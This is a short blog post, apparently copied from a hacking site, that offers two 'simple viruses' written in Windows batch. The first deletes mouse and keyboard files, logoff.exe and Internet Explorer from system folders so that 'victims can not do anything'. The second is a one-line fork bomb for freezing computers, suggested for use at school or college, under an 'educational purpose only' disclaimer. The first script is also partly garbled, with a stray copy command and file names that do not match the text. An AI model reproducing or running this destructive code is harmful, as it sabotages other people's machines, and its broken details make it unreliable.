Batch Programming  to Delete mouse,explore,logoff

Post date: Jun 15, 2011 9:35:54 AM

Usually we write simple viruses in batch programming. This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.

@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse

@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard

copy C:\windows\

@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe

@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

If you are doing this in your college or school,you can try this:

Tips 2 : Create a virus to make the computer freezed using Batch Programming

Now i am going to give you simple and only one line Batch code. Special about this virus is that easy to remember the code. So it will be useful to use in college or school.

  This is for newbie. This virus is harmful for CPU. So be careful. Don't run this in your pc or friend pc.

Open a notepad.

%0|%0

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

Courtesy breakthesecurity